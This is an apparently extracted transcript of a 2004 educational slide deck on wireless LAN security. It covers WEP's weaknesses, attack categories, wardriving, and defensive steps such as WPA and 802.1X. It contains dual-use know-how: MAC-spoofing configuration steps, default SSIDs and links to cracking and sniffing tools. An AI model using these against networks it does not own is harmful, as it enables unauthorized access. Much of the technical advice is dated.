Wireless LAN INsecurity 2003
Download
Report
Transcript Wireless LAN INsecurity 2003
Wireless LAN INsecurity 2004
Robert C. Jones, M.D.
LtCol, USAF, Medical Corps
Staff Anesthesiologist
Andrews Air Force Base, Maryland
E-mail: [email protected]
Web site: http://www.notbob.com
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Disclaimer: Fair Use of Online Resouces
FAIR USE NOTICE: This contains copyrighted material, which is reproduced
under the Fair Use Provision of Title 17, U.S.C. Section 107, and is posted for
purposes such as criticism, comment, news reporting, teaching, scholarship, or
research. This material is posted without profit for the benefit of those who, by
accessing this material, are expressing a prior interest in this information for
research and educational purposes.
In order to educate health care providers and other professionals, this presentation contains graphics and information obtained on the internet which may be copyrighted
According to Sections 107 and 504c of United States Code title 17, this material is considered to be “fair use” of copyrighted intellectual property; it is to be used for noncommercial purposes only
“Fair Use” is the use of a copyrighted work for purposes such as criticism, comment, news reporting, teaching (including multiple copies for classroom use), scholarship, or
research.
In determining whether the use made of a work in any particular case is a fair use, the factors to be considered shall include:
– The purpose and character of the use, including whether such use is of a commercial nature or is for nonprofit educational purposes;
– The nature of the copyrighted work;
– The amount and substantiality of the portion used in relation to the copyrighted work as a whole; and
– The effect of the use upon the potential market for or value of the copyrighted work.
The purpose and character of this presentation is for nonprofit educational purposes in support of Homeland Defense and internet security; the nature of the copyrighted work
is individual graphics and quotes; the amount and substantiality of the portion used is minimal; and the effect on the potential market for or value of the copyrighted use is
negligible. In fact, the hyperlink references crediting the original sources should increase the market value of said copyrighted works by increasing traffic to the websites
presenting this material.
This presentation was produced in the United States Air Force medical environment in the interest of academic freedom and the advancement of national defense-related
concepts. The views expressed in this presentation and linked-to material are those of the author(s) of said material and do not reflect the official policy or position of the U.S.
Air Force, Department of Defense, the United States government, or the AOMPS. Nor do educational links to internet websites or reference sources constitute any kind or
degree of verification or validation of information presented therein. Nobody paid me squat to write this stuff, by the way
Point of Contact for questions regarding copyright infringement shall be the current U.S. Department of Defense designated agent to receive notification of claimed DMCA
copyright infringement (courtesy of Department of Redundancy Department [DoRD])
Financial Disclosure: I am a Microsoft shareholder, so I can parody and provide commentary upon the products and services of the Microsoft Corporation with impunity
"We came across a company with one of these wireless
networks. All their source code, everything was
available. This network was beaconing, 'log onto me'...
It basically had its Rolls-Royce parked in the driveway,
engine running, with a sign saying 'steal me.' "
-- Thubten Comberford of White Hat Technologies, a
wireless security firm.
http://www.wirelessdevnet.com/articles/80211security/
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Wireless INSecurity in the News
http://www.wral.com/technology/2465963/detail.html
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Wireless INSecurity is Big Business
$100.00 per page…Think what a bargain this lecture is!
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
The Basic Network Security Pyramid
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Wireless Security 2003
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
What this talk is about
Introduction to Wireless LAN (WLAN) tech
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
What this talk is about
Introduction to Wireless LAN (WLAN) tech
Overview of Wireless vs. Wired network security
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
What this talk is about
Introduction to Wireless LAN (WLAN) tech
Overview of Wireless vs. Wired network security
Risks of specific WLAN technologies
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
What this talk is about
Introduction to Wireless LAN (WLAN) tech
Overview of Wireless vs. Wired network security
Risks of specific WLAN technologies
Wardriving 101
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
What this talk is about
Introduction to Wireless LAN (WLAN) tech
Overview of Wireless vs. Wired network security
Risks of specific WLAN technologies
Wardriving 101
Securing WLAN Communications
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
What this talk is about
Introduction to Wireless LAN (WLAN) tech
Overview of Wireless vs. Wired network security
Risks of specific WLAN technologies
Wardriving 101
Securing WLAN Communications
Future WLAN Security Issues
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
What this talk is about
Introduction to Wireless LAN (WLAN) tech
Overview of Wireless vs. Wired network security
Risks of specific WLAN technologies
Wardriving 101
Securing WLAN Communications
Future WLAN Security Issues
References
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
What this talk is NOT about
Cellular communication technology
GSM, CDMA, 2G, 2.5G,3G,4G…
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
What this talk is NOT about
Cellular communication technology
GSM, CDMA, 2G, 2.5G,3G,4G…
Uncommon alternatives to Wired LANs
Powerline technology, IR, laser, Avian IP
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
What this talk is NOT about
Cellular communication technology
GSM,
CDMA, 2G, 2.5G,3G,4G…
Uncommon alternatives to Wired LANs
Powerline technology, IR, laser, Avian IP
How to hack the airwaves for fun & profit
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
What this talk is NOT about
Cellular communication technology
GSM,
CDMA, 2G, 2.5G,3G,4G…
Uncommon alternatives to Wired LANs
Powerline
technology, IR, laser, Avian IP
How to hack the airwaves for fun & profit
How to ensure 100% WLAN security
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
You can’t afford perfect security
“The only secure computer is one that is
unplugged, locked in a secure vault that
only one person knows the combination
to, and that person died last year.”
Eckel, G and Steen, W., Intranet Working, New Riders, 1996, p. 419
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
What this talk is NOT about
Cellular communication technology
GSM,
CDMA, 2G, 2.5G,3G,4G…
Uncommon alternatives to Wired LANs
Powerline
technology, IR, laser, Avian IP
How to hack the airwaves for fun & profit
How to ensure 100% WLAN security
AFH* Topics: TEMPEST, HAARP, ECHELON
*Aluminum Foil Hat
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
This Talk Is Not For You If:
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
http://www.geocities.com/Area51/Dreamworld/1799/UNnwo2.html
CIA XXIV
What this talk is about
Introduction to Wireless LAN (WLAN) tech
Overview of Wireless vs. Wired network security
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Introduction to Wireless vs.
Wired Networking
Wired Networking
Inexpensive infrastructure (CAT5 cable + NICs)
Expensive deployment (drilling through walls)
Reconfiguring network topology difficult
Difficult (not impossible!) to intercept communication
Worldwide exposure to intruders if connected to Net
Fast! (10/100 Mbps Ethernet Gigabit ethernet…)
Negligible interference from environment
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Basic Wired Network Topology
Firewall
Router
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Introduction to Wireless vs.
Wired Networking
Wireless Networking
Expensive infrastructure (clients+APs=cha-ching!)
Inexpensive deployment (protocols supported in OSes)
Reconfiguring network topology trivial (?too trivial?)
Ridiculously easy to intercept communication
Geographically constrained exposure to intruders*
Relatively Slow (“11Mbps” marketingspeak = 5 Mbps)
Massive environmental interference (ISM, path loss)
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
*ad hoc intranetworks
CIA XXIV
Basic Wireless Network Topology
Infrastructure Mode
(using AP)
Firewall
Access Point
Advantages: AP security; isolated net connection
Disadvantages: AP cost, complexity; broadcast range
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Basic Wireless Network Topology
P2P Ad Hoc Networks
Firewall
Advantages: no addt’l hardware; geographically constrained
Disadvantages: unmanaged P2Pnet issues; geo. constrained
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
STA 2003
Basic WLAN Discovery
Beacon Mode (default for 802.11b)
10 Hz signal with SSID
in clear text + info
regarding security
support by AP (WEP,
802.1x, etc.)
STA
Beacon mode shut off probe from station (STA)
valid SSID returned
STA
probe from STA with
SSID = blank or “any”
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Basic WLAN
Authentication & Association
Authentication: process of verifying the
credentials of a client asking to join a WLAN
Association: process of connection client to a
given AP in the WLAN
802.11 standard specifies 3 states:
Unauthenticated + Unassociated
Authenticated + Unassociated
Authenticated + Associated
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Authentication
Default: Open authentication (+/- MAC/SSID filtering)
“granted”
“give me access”
Shared
Key Authentication (e.g., WEP)
“granted”
Authentication response
Authentication challenge
“give me access”
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Generic Wireless Security Exploits
Physical Theft
Eavesdropping
Data Modification
Identity Spoofing/Masquerading
Denial of Service (DoS)
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Let’s Get Physical
Physical theft of laptop/PDA 3rd most common
network security threat facing businesses (2003)
Laptop = Expensive; Proprietary Data = Priceless
No one is immune (FBI; DEA; IRS; State
Department; Qualcomm CEO…)
Theft of proprietary data #1 cause of financial loss
by corporations
References: State Dept.: http://www.computerworld.com/governmenttopics/government/legalissues/story/0,10801,54791,00.html
FBI/DEA/IRS: http://www.nwfusion.com/newsletters/sec/2002/01514404.html
Qualcomm CEO: http://zdnet.com.com/2100-11-523990.html?legacy=zdnn
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Source:
http://www.gocsi.com/awareness/fbi.jhtml
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Generic Wireless Network Exploits
Physical Theft (Before)
Firewall
Access Point
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Generic Wireless Network Exploits
Physical Theft (After)
Firewall
Access Point
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Generic Wireless Network Exploits
Eavesdropping Case 1: Wardriving
Firewall
Access Point
Gotcha!
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Generic Wireless Network Exploits
Eavesdropping Case 2: Office Building
Tabloid
Firewall
Access Point
Terrorist
Your Competitor
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Generic Wireless Network Exploits
Eavesdropping Case 3:
Rogue APs
Firewall
Access Point
Rogue Access Point
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Generic Wireless Network Exploits
Eavesdropoing Case 4:
P2P Ad Hoc Networks
Insecure connection to
outside APs
Firewall
• Unwise placement
Insecure modem
connection
• High-power client
•Unauthorized antenna
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
STA 2003
The 100 meter myth
Increasingly powerful 802.11x clients available
200 mW PCMCIA cards advertise 6000+ ft range
http://products.wi-fiplanet.com/wifi/pc_card_16-bit/1058052117.html
Most WiFi® adapters have external antenna
connections; even homemade antennas work well
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Generic Wireless Network Exploits
Data Modification (Man in the Middle Attack)
“Meeting
postponed; go
home early”
Bob
Firewall
Access Point
Listen
Read
Corrupt
Cats
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
Forge
Send
Alice
Corrupt
“Need project
Chortle
now!” Ref: Edney J, Arbaugh, WA, Real 802.11 Security, pp. 37-40
STA 2003
Generic Wireless Network Exploits
Identity Spoofing
MAC Address: 0000deadbeef; SSID: default
Looks like
your
company’s
IP to the
FBI!
Bob
Firewall
Access Point
Alice
Cats
Spoof MAC Address: 0000deadbeef; SSID: default
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
STA 2003
Generic Wireless Network Exploits
Denial of Service (DoS)
microwave
oven
Cell phone
Firewall
Access Point
Bluetooth device
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
2.4 GHz
jammer
STA 2003
What this talk is about
Introduction to Wireless LAN (WLAN) tech
Overview of Wireless vs. Wired network security
Risks of specific WLAN technologies
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Risks of Specific WLAN technologies
802.11x/WiFiTM
ISM vulnerability
MAC/SSID authentication insecurity
WEP insecurity
Bluetooth
HIPERLAN/2 (Europa: ETSI*)
HiSWAN (日本: MMAC†)
*European Telecommunications Standards Institue: http://www.hiperlan.uk.com/pages/hiperlan.htm
†Multimedia Mobile Access Communication: http://www.arib.or.jp/mmac/e/
CIA XXIV
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
IEEE 802.11 Risks
ISM: Industrial, Scientific, and Medical Spectrum
Not reserved: Allocated for “Amateur” use
Long list of things that cause interference in 2.4
GHz range:
2.4 GHz cell phones/portable phones
Microwave ovens
Stained glass windows
Portable jammers (illegal in USA)
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
MAC/SSID Vulnerability
MAC = media access control address
Hardcoded in all NICs
Easily Spoofed (Win 9x, Linux; not WinXP)
SSID = Service Set Identifier
Used to define networks
By default, broadcast by access points
Will be given out by AP if client configured with
“any” or blank SSID
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Default SSIDs
3Com: comcomcom
Cisco: 2, tsunami, WaveLAN Network
Compaq: Compaq
With AP manufacturer,
trivial to determine default
DLink: WLAN
Administrator
Intel: 101, 195, xlan, intel
username/password!
Linksys: linksys, Wireless
Netgear: Wireless
Zcomax: any, mello, Test
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
http://www.cirt.net/cgi-bin/ssids.pl
http://www.iss.net/wireless/WLAN_FAQ.php
CIA XXIV
WEP…what is WEP?
Wired Equivalent Protocol (NOT Wireless Encryption Privacy)
First defined in 1999 ANSI/IEEE Std. 802.11, section 8.2
http://standards.ieee.org/getieee802/download/802.11-1999.pdf
Never intended to provide strong security; Goals:
“Reasonably strong” (dependent on key length)
“Self-synchronizing” (for “best effort” delivery)
“Efficient” (low processor overhead)
“Exportable” (pre-1999 ITAR climate [Phil Zimmerman])
“Optional” (so lusers don’t whine to hardware manufacturers
when they mess up WEP on their networks– DISABLED out of
the box by all OEMs as of 2003 AFAIK*)
*AFAIK= As far as I know
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Encryption Basics
XOR Logic Gate
Need to hide message (plaintext) = needle
Generate random stuff (encryption key) = piece of hay
Multiply random stuff (keystream) = haystack
Hide message in haystack (XOR) needle+haystack (ciphertext)
http://www.mesda.com/files/infosecurity200309.pdf; http://hyperphysics.phy-astr.gsu.edu/hbase/electronic/xor.html
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
Intro to Encryption: http://home.ecn.ab.ca/~jsavard/crypto/jscrypt.htm
CIA XXIV
How is WEP supposed to work?
• Secret key combined with IV, run through WEP cipher PRNG (RC4)
• Plaintext XORed with key sequence (irreversible without key)
• Ciphertext output sent over airwaves after encapsulation into IP packets
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
http://standards.ieee.org/getieee802/download/802.11-1999.pdf
CIA XXIV
What is RC4?
One encryption algorithm (many others: DES, IDEA, Blowfish, AES, etc.)
Efficient streaming cipher (low overhead)-- used in SSL encryption (online banking, etc.)
Proprietary trade secret of RSA Inc. http://www.rsasecurity.com
Presumed RC4 source code uploaded to Usenet newsgroup sci.crypt 13 Sep 1994…all
open source RC4 implementations based on this anonymous post (including WEP)!
From: [email protected] (An0nYm0Us UsEr)
Newsgroups: sci.crypt
Subject: RC4 ?
Date: 13 Sep 1994 21:30:36 GMT
Organization: Global Anonymous Remail Services Ltd.
Lines: 83
Message-ID: <[email protected]>
NNTP-Posting-Host: xs1.xs4all.nl
X-Comment: This message did not originate from the above address.
X-Comment: It was automatically remailed by an anonymous mailservice.
X-Comment: Info: [email protected], Subject: remailer-help
X-Comment: Please report inappropriate use to <[email protected]>
SUBJECT: RC4 Source Code
I've tested this. It is compatible with the RC4 object module
that comes in the various RSA toolkits.
/* rc4.h */
http://groups.google.com/groups?selm=35gtd7%24404%40ccu2.auckland.ac.nz&oe=UTF-8&output=gplain
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Why is WEP Broken?
First paper: Fluhrer, Mantin, Shamir (encryption
flaws) http://www.securityfocus.com/data/library/rc4_ksaproc.pdf
WEP attack using FMS method: Stubblefield,
Ionnidis, Rubin http://www.cs.rice.edu/~astubble/wep/
WEP standard implements RC4 improperly
http://www.rsasecurity.com/rsalabs/node.asp?id=2009
Flaws in key scheduling algorithm Large number
of weak keys encryption easily cracked
IV is sent in the clear with each chunk– subtract 24
bits of IV from encryption key length
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
http://wombat.doc.ic.ac.uk/foldoc/foldoc.cgi?RC4
CIA XXIV
Quick Fix for WEP: WPA
WPA = “WiFiTM Protected Access”
Available as software/firmware upgrade for most
chipsets/manufacturers now or soon
Subset of upcoming 802.11i security architecture
Patches major vulnerabilities in WEP:
TKIP fixes IV weakness, adds MIC, key mixing, rekeying
Supports enterprise user authentication via EAP and 802.1X
SOHO mode: Pre-Shared Key (PSK): autorotates key for you
http://www.newswireless.net/articles/021123-protect.html
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Risks of Specific WLAN technologies
802.11x/WiFiTM
ISM vulnerability
MAC/SSID authentication insecurity
WEP insecurity
Bluetooth
HIPERLAN/2 (Europa: ETSI*)
HiSWAN (日本: MMAC†)
*European Telecommunications Standards Institue: http://www.hiperlan.uk.com/pages/hiperlan.htm
†Multimedia Mobile Access Communication: http://www.arib.or.jp/mmac/e/
CIA XXIV
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
Risks of non-802.11x WLAN technologies
Bluetooth
Minimal security “out of the box”– need to RTFM
Security upgrade in B’tooth Spec. 1.2
http://www.itsecurity.com/tecsnews/jun2003/jun255.htm
Red Fang: Bluetooth device discovery tool from @Stake
(formerly L0pht Heavy Industries)– proof of concept; not very
practical http://www.kewney.com/articles/0300910-bluestake.html
References: http://www.webdesk.com/bluetooth-security-issues/; www.giac.org/practical/GSEC/Tu_Niem_GSEC.pdf
HIPERLAN/2
HiSWAN
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
HIPERLAN/2 and HiSWAN: Future
Technologies for Future Talks
Technology needs to “hit the street” for serious
security issues to arise
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
What this talk is about
Introduction to Wireless LAN (WLAN) tech
Overview of Wireless vs. Wired network security
Risks of specific WLAN technologies
Wardriving 101
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Wardriving 101
Definition: Mobile discovery of WLANs
Derived from term “wardialing”: automated dialing of
telephone numbers looking for modems (“Wargames”)
Related terms: Warwalking, warflying, warchalking…
NOT illegal in USA as of 2003: open ISM spectrum
HOWEVER, ethical wardrivers NEVER connect to the
networks they detect, let alone implant/steal data
therefrom (see Jeff Duntemann, Drive-by WiFi Guide)
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
http://www.paraglyphpress.com/pr02242003.php
CIA XXIV
Why Wardrive?
Fun: Sense of adventure a la 007
Informative: Teaches one about WLAN security
Cheap Hardware: Laptop + client +/- antenna +/- GPS
Free Software: Netstumbler, BSDAirtools, Airsnort…
Camaraderie: Group wardriving contests popular
31337 Hobby: In-crowd lingo (WEP, )(, tsunami)
Business tool: Audit your own network to improve
security/demonstrate insecurity to management
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Wardriving Hardware
Old laptop with WLAN client +/- GPS
Pigtail– connects wireless card to antenna
Antenna– omnidirectional, magnetic mount, low
Duško i Vlado prizivaju bežične signale:
profile best http://www.wardriving.com/fiva.jpg;
http://www.monitor.hr/interview/ wireless.htm (in Croatian, from Zagreb)
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Wardriving Software
NetStumbler http://www.netstumbler.com/
MacStumbler http://www.macstumbler.com/
BSDAirtools http://www.dachb0den.com/projects/bsd-airtools.html
AirSnort http://airsnort.shmoo.com/
Kismet http://www.kismetwireless.net/
Wellenreiter http://www.wellenreiter.net/
Lots of other tools:
http://wardrive.net/wardriving/tools
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Preparing for Safe and Ethical Wardrive
Use non-production box (old laptop)– just in case
Change network ID to generic name (e.g., MSHOME, localhost)
Update client software/firmware
Uninstall TCP/IP from supported wireless card
Uninstall TCP/IP from integrated wireless (if any)
Spoof MAC address of wireless card (can’t in XP)
Delete preferred networks (XP): Control Panel | Network | Card | Properties |
Wireless Networks | Preferred Networks
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Disable prior to
wardrive to
prevent autoconnection to
discovered APs
MAC Address Spoofing
edit /etc/sysconfig/network-scripts/ifcfg-eth0
(assuming it's your eth0 network card that you
want to change the MAC for), and add a line
like this: MACADDR=AA:BB:CC:DD:EE:FF
(Obviously you want to substitute the MAC
address you want in place of
AA:BB:CC:DD:EE:FF) Then "/sbin/ifdown
eth0", "/sbin/ifup eth0", and you should be up
and running with the new MAC address. You
can use "/sbin/ifconfig eth0" to verify that the
new MAC address is in effect -- it shows up in
the 'HWaddr' entry on the first line that
ifconfig prints
Orinoco Gold on Win 98SE
(YMMV RTFM HTH)
Red Hat Linux
http://groups.google.com/groups?selm=bb8vft%24lma%241%40news01.intel.com&oe=UTF-8&output=gplain
CIA XXIV
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
Conducting Safe and Ethical Wardrive
Read up on local/national laws before you set out
Be careful with pigtails– fragile!
Put laptop in back of car (behind driver) to prevent
distraction (local laws against watching TV, etc. +
common sense safety measure)
Drive during day– no suspicious eerie glow
Optimum speed around 30 MPH
Screenshots: shift|print screen or graphics program
(PaintShop Pro, etc.); stop car safely if alone
PSP8: http://www.jasc.com
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Results of a “WarSit™” in San Francisco
Wardriving + GPS
http://www.netstumbler.com/nation.php
Here there be Warchalkers
Mainly mythical meme
Originated by Matthew D. Jones, Ph.D.
Open node symbolized by )(
)( Often used as 31337 shorthand for
wardriving
Don’t Warchalk: the world has enough
graffiti
http://www.blackbeltjones.com/warchalking/warchalking0_9.pdf
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
What this talk is about
Introduction to Wireless LAN (WLAN) tech
Overview of Wireless vs. Wired network security
Risks of specific WLAN technologies
Wardriving 101
Securing WLAN Communications
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
The Basics to Do Now
Pay attention to geographical location of AP (parking lot coverage)
Disable file & print sharing if not needed; never share root
Disable SSID broadcasting (default = enabled for most products)
Change the SSID to something non-default which says nothing
about you or network (boring = good; Smithfamilydiamonds = bad)
Upgrade firmware of AP/client to increase security (WPA)
Change default administrator login/password for AP
Set authentication to “Shared Key” or “Auto”, not “Open System”
Configure AP to enable MAC address filtering (not perfect, yes…)
Enable WEP/WPA
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Bbbbut…isn’t WEP broken?
Yes, but…just because your front door can be
picked, doesn’t mean you shouldn’t lock it!
Never be low hanging fruit for attackers
If you just enable WEP more secure than 75%
of WLAN users (according to wardriving data)
If you enable WEP + change SSID from default
+ change AP logon/pw: more secure than 95%
of lusers
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Enabling WEP
Orinoco Gold on Win 98SE
Linksys pic modified from: http://www.timhiggins.com/Reviews/images/scrnshots/linksys_wap54g_setup.jpg
CIA XXIV
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
Advanced WEP
Freeware key generators create pseudorandom
keys for you to enter
Rotate keys frequently (weekly for business,
monthly for home at minimum)
Make sure highest key-length WEP is enabled
(remember, 64 bit WEP key is really just 40 bits
long [thanks, marketing!])
Upgrade WEP to WPA as soon as possible (look
for WPA support for all new hardware)
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Advanced WLAN Security: Topology Options
“Safe Side”
“Unsafe Side”
Firewall
Treat all wireless communication as insecure
Put AP on “unsafe” side of firewall
Use VPN (private tunnel) through internet to reach internal network
Impractical for SOHO networks (expensive; throughput hit)
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Advanced WLAN Security Upgrades
802.1X port-based authentication– requires dedicated
authentication server (or server process in AP)
RADIUS authentication: for enterprises only
IEEE 802.11i = WPA + RSN; currently in draft form
RSN: Robust Security Network 802.1X + EAP +
AES (non-WEP encryption protocol) – will likely need
hardware upgrade to run RSN without major hit on
throughput; likely available in “mature” form in 2005-6
(world will be beta-testing 802.11i during 2004)
802.11i (excellent): http://www.commsdesign.com/design_library/cd/wl/OEG20021126S0003
802.11i (advanced): http://csrc.nist.gov/wireless/S10_802.11i%20Overview-jw1.pdf
CIA XXIV
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
RSN: http://www.nwfusion.com/news/tech/2003/0526techupdate.html
What this talk is about
Introduction to Wireless LAN (WLAN) tech
Overview of Wireless vs. Wired network security
Risks of specific WLAN technologies
Wardriving 101
Securing WLAN Communications
Future WLAN Security Issues
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Future WLAN Security Issues
Biological hazards of radio communications
Military implementation of DOS vs. WLANs/cellular
Geographic extension of WLAN-- ablation of security
through propinquity (ELF; satellites with ultra-sensitive
sensors)
Legal aspects (HIPAA, due-diligence) and need to
implement security & audit for rogue APs, wardrivers
Follow-on Technologies: UltraWide Band (UWB), others
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
WLAN = Biohazard?
3G networks have been shown to affect cognition of
volunteers & create headaches, nausea
Interestingly, enhanced memory and alertness
As we become surrounded by WLANs, PANs, WANs,
and cellular broadcasting towers, are we harming our
fragile neurological systems?
No evolutionary exposure to MW radiation at current
levels…will our children’s children adapt?
http://edition.cnn.com/2003/TECH/ptech/10/01/g3.health.reut/index.html
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Beware the Wolfpack
Small, autonomous sensor-jammers that intelligently coalesce into WLAN
on battlefield; 6 lb canisters initiate RF DOS within 500 meter radius
Link together to overpower enemy’s WLAN/cellular communications
Part of DARPA XG (Next Generation) RF dominance initiative
http://www.darpa.mil/DARPATech2002/presentations/ ato_pdf/speeches/MARSHALL.pdf
http://www.darpa.mil/ato/programs/wolfpack.htm
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
http://www.theregister.co.uk/content/69/32361.html
http://www.defenselink.mil/news/Aug2003/n08142003_200308147.html
CIA XXIV
Physician, Audit Thyself
Lots of commercial products out
there to audit networks for rogue
APs, P2P connections, wardrivers
May become legal requirement in
future for HIPAA compliance
(along with advanced security
afforded by RSN/802.11i [final
standard anticipated May 2004])
Pictured:
Airmagnet
Handheld PAK®
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
http://www.airmagnet.com/products/handheld.htm
http://www.airdefense.net/products/index.html
http://www.wildpackets.com/products/airopeek
CIA XXIV
Patch OS frequently to
plug wireless security
holes; read media for new
WLAN exploits
802.1X, 802.11i, RSN;
VPN + RADIUS for
enterprises
Change default
admin logon/pw
Enable; rotate
keys manually
Got WPA/802.1X?
Upgrade WEP ASAP
Change default;
don’t broadcast
Prevent theft;
BIOS pw; encrypt
sensitive files
Assume
wardrivers,
snoopers all
around you
The Tao of Network Security
1994-1999:
Information
Access
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
The Tao of Network Security
1994-1999:
2000-2005:
Information
Access
Information
Denial
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
What this talk is about
Introduction to Wireless LAN (WLAN) tech
Overview of Wireless vs. Wired network security
Risks of specific WLAN technologies
Wardriving 101
Securing WLAN Communications
Future WLAN Security Issues
References
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Online Resources
WLAN Specifications
•WiFiTM Alliance (formerly WECA): http://www.weca.net/
•IEEE 802.11: http://standards.ieee.org/getieee802/portfolio.html
•IEEE 802.11i: Latest draft (private): http://grouper.ieee.org/groups/802/11/private/Draft_Standards/11i/802.11i-D6.0.doc
Lots of interesting
documents: http://www.ieee802.org/11/Documents/DocumentHolder/
•Bluetooth:
https://www.bluetooth.org/
•HIPERLAN/2: Official Specs: http://www.hiperlan2.com
IEEE Communications Overview: http://www.ihpffo.de/systems/Doc/Vorlesung/MC/ %DCbung/Gruppe7-Hiperlan/0130khun.pdf
•HiSWAN: http://www.arib.or.jp/mmac/e/index.htm
•Avian IP Transport Protocol (RFC 1149): http://www.ietf.org/rfc/rfc1149.txt?number=1149
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Online Resources
Basic 802.11 Security
•WLAN Security FAQ (ISS): http://www.iss.net/wireless/WLAN_FAQ.php
